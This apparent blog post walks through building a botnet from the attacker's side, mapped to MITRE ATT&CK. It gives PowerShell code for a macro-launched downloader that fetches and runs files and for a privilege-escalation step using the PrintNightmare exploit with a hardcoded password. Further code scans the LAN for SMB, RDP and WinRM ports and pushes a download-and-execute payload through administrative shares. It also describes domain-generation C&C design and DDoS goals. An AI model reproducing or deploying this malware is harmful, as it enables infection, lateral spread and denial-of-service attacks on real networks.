Malware Development: Botnet-Based

● 06 Sep 2023

In this article, I will discuss the fundamentals of botnets development, givin’ insights into their structure and operation. After reading the post “How to make IOT botnet”, I decided to write an article about a botnet project that I wrote a long ago and how vulnerabilities are exploited by worms to spread through networks.

What is a Botnet? a botnet is a network of computers infected by malware and controlled by a single entity or party. Botnets usually operate through three stages or more. In this article, I’ll go over each stage, explaining how they work, and provide code example.

To better understand how this works, we can map a development process to the MITRE ATT&CK framework, which outlines the TTP’s.

Tactic	Technique ID	Technique Name	Procedure
Initial Access	T1566.001	Phishing: Spear	Fake invoice attachment containing a macro that triggers malware execution.
Execution	T1059.001	Command and Scripting	PowerShell script downloads and executes the next malware stage.
Persistence	T1547.001	Boot or Logon Autostart Execution	Uses Registry Run Keys / Startup Folder to maintain persistence.
Privilege Escalation	T1068	Exploitation for Privilege Escalation	Exploits PrintNightmare vulnerability (CVE-2021-34527) to gain SYSTEM privileges.
Defense Evasion	T1027	Obfuscated Files or Information	Uses base64 encoding, string manipulation, and encryption to hide PowerShell scripts and payloads.
Lateral Movement	T1021.002	Remote Services: SMB/Windows Admin Shares	Propagates to other devices by exploiting SMB shares.
Command and Control	T1071.001	Application Layer Protocol	Communicates with C2 server via HTTP/HTTPS using Domain Generation Algorithm (DGA) to evade detection.
Impact	T1498	Network Denial of Service	Launches Distributed Denial of Service (DDoS) attacks on target servers.

Entry Point

The primary approach involves utilizing spam campaigns, This method is preferred due to its simplicity making it challenging to trace the origin of the initial infection or its source. The attack is mass rather then targeted, So, Typically you get an e-mails contain an attachment that is often referred to as an invoice, and that’s usually the stage 1 of every infection “The macro” a social engineering attempt to lure an unsuspecting victim into executing the payload of the document, In this article we gone wear the black hat and play the role.

The malware operates multi-stage components that inject later stages into separate processes, First exploit a vulnerability for the sake of this article I’m gone deploy an old (not so old ) vulnerability Known as “Print Spooler Vulnerability” or “PrintNightmare” to infect vulnerable devices and spread the malware within the network, Next deployed our payload and finally phone C&C to activated and attack is initiated. The main goal is to establishes a connection to a target server, receives instructions, and then launches the DDoS attack using multiple threads.

During this 1 phase, we assume that the target has fallen for our social engineering tactic and activated the embedded macro within the document. Upon opening the file, the contained code is executed, leading to the deployment of a PowerShell script.

$urlArray = \"".split(\",\");
$randomNumber = $randomGenerator.next(1, 65536);
$downloadedFile = \"c:\windows\temp\";
foreach($url in $urlArray){
	try{
		$webClient.downloadfile($url.ToString(), $downloadedFile);
		start-process $downloadedFile;
		break;
	}catch{}
}

Specifically, it targets the directory _C:\windows\temp/_. If the download is successful, the acquired file is executed. Should an error arise, the process continues with the next URL, as the catch clause is left empty.

Stage 2 - Payload Delivery

When this phase is triggered, the next stage involves checking a set of conditions before proceeding to download the final payload, These conditions are there for a controlled execution “we do not wanna shoot ourselves”.

One of these conditions is OS-Specific. Why? Remember the vulnerability I mentioned we’re targeting. When you’re exploiting PrintNightmare, the payload that works on Windows 10 won’t necessarily work on, say, Windows Server 2012. Why? the vulnerability might behave slightly differently depending on the version.

However, that’s only if we know the version. The vulnerable systems(Windows 7, 8, and 10, as well as Server Editions from 2012 and even as far back as 2008, which was no longer in mainstream support References: msrc

When the trigger is activated, the script first verifies a set of conditions to ensure a controlled execution “I do not want shoot myself”. we gathers key host data and checks for administrative privileges.

In simple terms,

Generating a payload DLL.
Constructing custom data structures.
Attempting to load the DLL as a printer driver.

At its core, the Invoke-Nightmare function builds and deploys the exploit payload. It takes parameters like a benign driver name, a new username, a new password, and optionally a custom DLL. If no DLL is provided, it generates one from a base64-encoded string (using the get_nightmare_dll function), embeds the credentials if given, and saves it temporarily.

Before executing the exploit, (Test-Admin) to check for admin privileges. If the user already has administrative rights, no escalation is attempted.

function PrivEsc {
    if (-not (Test-Admin)) {
        $NightmareCVE = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($PrintNightmare))
        $d_path = "c:/users/$env:USERNAME/appdata/local/temp/$(Get-RandomString (Get-Random -Minimum 5 -Maximum 12))"
        Set-Content -Path "$d_path.ps1" -Value $NightmareCVE
        $try_nightmare = Invoke-Expression -Command "Import-Module $d_path.ps1; Invoke-Nightmare -NewUser '$env:USERNAME' -NewPassword '0xph001234!!'"
        if (Test-Admin) {
            Write-Host "got admin!"
            return $true
        }
        $check_imp = Invoke-Expression -Command 'whoami /priv' | ForEach-Object { $_.ToLower() }
        foreach ($line in $check_imp) {
            if ($line -match 'seimpersonateprivilege' -and $line -match 'enabled') {
            }
        }
    }
    return $false
}

I designed it to generate a new PowerShell script file in a random directory $d_path.ps1 where I write the decoded exploit code. then executes the file using Invoke-Expression, imports it with Import-Module, and calls the Invoke-Nightmare function with parameters including the current username ($env:USERNAME) and a new password (‘0xph001234!!’).

After running the exploit, we checks for admin privileges using Test-Admin. If admin rights are confirmed, it outputs “got admin!” and returns true to signal success. Finally, it runs whoami /priv to verify whether the privilege escalation was successful or if the user already had the necessary rights.

Simple right ? not really

Stage 3 - Enumeration and Propagation

In this phase, I perform network enumeration by scanning for vulnerable ports and exploiting open ones for potential propagation.

Usin’ the System.Net.NetworkInformation.NetworkInterface class, we got a list of all network interfaces on the local system. I deliberately filter out the loopback (‘lo’) interface since it’s only for local testing. For every remaining interface, extract the IPv4 addresses that match common private IP ranges (like 192.168.x.x or 172.16.x.x) and store these in the $localIP array. The foundation for local network enumeration.

function Get-LAN {
    $interfaces = [Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
    $localIP = @()

    foreach ($interface in $interfaces) {
        if ($interface.Name -eq 'lo') {
            continue
        }
        
        $iface = $interface.GetIPProperties().UnicastAddresses | Where-Object { $_.Address.AddressFamily -eq 'InterNetwork' }
        if ($iface -ne $null) {
            foreach ($j in $iface) {
                $addr = $j.Address.IPAddressToString
                if ($addr -match '^192\.168|^172\.16') {
                    $localIP += $addr
                }
            }
        }
    }
    return $localIP
}

Next, I use the IP addresses gathered from the Get-LAN function and iterate through a list of ports that attackers commonly target. This approach helps identify vulnerable ports within the local network, setting the stage for further propagation.

function Get-VulnPorts {
    $vulnPorts = @('445', '3389', '5985')
    $vuln = @{}
    $localIP = Get-LAN

    foreach ($addr in $localIP) {
        $ipParts = $addr -split '\.'
        $range = [ipaddress]::Parse("$($ipParts[0]).$($ipParts[1]).1.0/24")

        foreach ($ip in $range.AddressList) {
            foreach ($port in $vulnPorts) {
                $client = New-Object System.Net.Sockets.TcpClient
                $result = $client.BeginConnect($ip, $port, $null, $null)
                $wait = $result.AsyncWaitHandle.WaitOne(100, $false)
                if ($wait -and !$client.Connected) {
                    if ($vuln.ContainsKey($ip.ToString())) {
                        $vuln[$ip.ToString()] += ",$port"
                    } else {
                        $vuln[$ip.ToString()] = $port
                    }
                }
                $client.Close()
            }
        }
    }
    return $vuln
}

Test whether a connection can be established for each IP address and port combination. If a connection attempt fails, log the IP and port in a hash table called $vuln and have a list of ports (445 for SMB, 3389 for RDP, and 5985 for WinRM) and iterate through each local IP, using System.Net.Sockets.TcpClient to test. Failed connections indicate open, and likely vulnerable, ports, which then get recorded in $vuln.

function Abuse-OpenPorts {
    $smb = '445'
    $mstsc = '3389'
    $ports = Get-VulnPorts

    foreach ($ip in $ports.Keys) {
        $openPorts = $ports[$ip] -split ','

        foreach ($port in $openPorts) {
            if ($port -eq $smb) {
                Drop-OnShare $ip
            } elseif ($port -eq $mstsc) {
                MSTSC-Nightmare $ip
            }
        }
    }
}

See whether any ports identified correspond to specific services, such as SMB (port 445) or RDP (port 3389).
Depending on the service associated with an open port, the function invokes corresponding functions, such as Drop-OnShare or MSTSC-Nightmare, to escalate the potential vulnerability.
For open ports that match SMB (port 445), the Drop-OnShare function is called to exploit shared network resources on remote systems.
For open ports corresponding to RDP (port 3389), the function invokes the MSTSC-Nightmare function to further exploit the potential vulnerability.

If pass the function invokes Drop-OnShare to execute actions targeting shared resources. Similarly, if the vulnerable port matches RDP (port 3389), MSTSC-Nightmare is invoked to further exploit the situation.

Finally leveraging information gathered to exploit shared network resources on remote systems. Its core functionalities include payload delivery and lateral movement:

function Drop-OnShare($ip) {
    $payload = @"
    (New-Object Net.WebClient).DownloadFile('', 'C:\phoo.exe')
    Start-Process 'C:\'
"@
    
    $defaultShares = @('C$', 'D$', 'ADMIN$')
    $availableDrive = Get-PSDrive -Name 'Z' -ErrorAction SilentlyContinue

    if ($availableDrive -eq $null) {
        $availableDrive = Get-PSDrive -Name ('A'..'Z' | Where-Object { Test-Path $_: -PathType Container } | Select-Object -First 1)
    }

    foreach ($share in $defaultShares) {
        try {
            $sharePath = "\\$ip\$share"
            if (Test-Path -Path $sharePath) {
                $null = Invoke-Expression -Command "net use $($availableDrive.Name): $sharePath /user:username password 2>&1"
                if (Test-Path -Path "$($availableDrive.Name):") {
                    $payloadPath = "$($availableDrive.Name):\aaaa.ps1"
                    $payload | Set-Content -Path $payloadPath
                    $null = Invoke-Expression -Command "powershell -ExecutionPolicy Bypass -File $payloadPath"
                    Remove-Item -Path $payloadPath
                    $null = Invoke-Expression -Command "net use $($availableDrive.Name): /delete /yes"
                }
            }
        }
        catch {}
    }
}

The primary purpose of the Drop-OnShare($ip) function is to utilize the inherent vulnerabilities of shared network resources to distribute and execute payloads. Taking advantage of administrative shares, which does two main things: it delivers a payload and facilitates lateral movement within the network.

For each default administrative share (C$, D$, ADMIN$), it attempts to map the share to the available drive using the net use command with supplied credentials (username and password), If the share mapping is successful, the payload is written to a file on the remote system, executed, and then removed.

Stage 4 – The binary

Once we got the stages and conditions are met we can proceeds as planned, the user’s device becomes part of our botnet. This involves the binary to identify and connecting to (C&C) server for what’s next.

To make it harder, we got a Domain Generation Algorithm (DGA) going that dynamically generates domain names linked to the C&C server. Only the C&C operators know the algorithm’s specifics, making it difficult for defenders to block or predict communication.

The DGA generates domain names daily based on system parameters like the current date and time. It can produce up to 50 domains per day, giving the botnet flexibility to switch domains and evade takedowns. The malware tests up to 20 different domains in sequence, trying each domain only once to avoid creating detectable patterns. A built-in 5-second delay between connection attempts adds another layer of stealth, preventing suspicious bursts of network activity.

The domain generation starts by creating a cryptographic seed based on the system time and sequence number. The seed is hashed using SHA256, providing a unique and hard-to-guess value for each domain name.

The core function generates a complete domain name:

It selects a random suffix from a predefined list.
Calculates the SHA-256 hash, year, month, and day.
Converts the SHA-256 hash to a hexadecimal string.
Generates additional domain parts based on the hex values from the hash.
Appends the selected suffix to complete the domain name.

Entry point:

Seeds the random number generator with the current time.
Enters a loop to generate 50 domain names, each unique due to the random sequence number and date.
For each iteration, it generates a random sequence number, retrieves the current date, calls create_domain to generate a domain name, and tested it. It then waits for 5 seconds before the next iteration.

Top Level Domain :

The code defines an array called suffixes that contains a list of possible top-level domain (TLD) suffixes. These suffixes represent the highest level of the domain hierarchy (e.g., “.xyz,” “.cool,” “.ninja”).

const char *suffixes[] = {".xyz", ".cool", ".ninja"};

Domain Resolution: When a bot needs to establish communication with the C&C server, it calculates the current domain name using the DGA algorithm.
The algorithm generates a domain name that the bot will attempt to resolve into an IP address.
C&C Server Setup: The botnet configure a large number of domain names corresponding to possible future C&C servers, These domain names are registered in advance.
Dynamic Resolution Attempt: When the bot attempts to connect to the C&C server, it tries to resolve the generated domain name into an IP address.

The domain name may not exist initially, but at some point in the future, the author will register one of the pre-generated domain names, associating it with the IP address of the actual C&C server.

Generating domain names is just one aspect of communication with a C&C server. To establish communication with a C&C server, typically needs additional functionality, such as:

Network Communication: The code needs to communicate over the network, typically using protocols like HTTP, HTTPS, or custom protocols. This would involve creating sockets, sending requests to the C&C server, and receiving responses, Next, Command Parsing and Data Encryption/Decryption C&C communications are encrypted to hide the actual content from network monitoring, Persistence and finally, Data Exfiltration.
Our botnet should: Include a master node that controls all other nodes on the network, Deploy disguised malware/slave nodes on host computers transmit commands from the master node to the slave node, execute, and return an output back to us

Initiation:

int channel = //initiate a channel given SERVER, PORT, and name;

Once the slave is connected to the master, it needs to constantly be listening for messages and act immediately upon a command. So, let’s use an infinite while loop to receive and parse these messages, below the printf statement, add an infinite while loop that calls two functions: recieve() and parse() in that order. Both functions take the channel and msg stack buffer as arguments. This should look something like:

Infinite Loop {   
    recieve(...);  
    parse(...); 
}

Also It’s important to note that having a large number of bots attempting to connect to a single C&C server simultaneously can inadvertently launch a Distributed Denial of Service (DDoS) attack against the server. To address this, we adopt a hierarchical structure where groups of bots, typically in batches of a fixed number like 50, report to intermediary nodes. These nodes can be part of the botnet and may further relay requests and responses to other nodes before reaching the main C&C server. This division of labor helps distribute the load and reduces the risk of DDoS attacks on the primary C&C server.

Final Notes

And that’s a wrap! Hopefully, you picked up something new along the way. I didn’t want to dive too deep into the technical rabbit hole the whole point here is to show that malware doesn’t always have to be super advanced or complex to get the job done. Most of the time, it’s not zero-days or fancy exploits that break systems it’s human error and good old social engineering. Even today, social engineering remains one of the most effective ways to spread malware and pull off offensive ops.

Malware Programming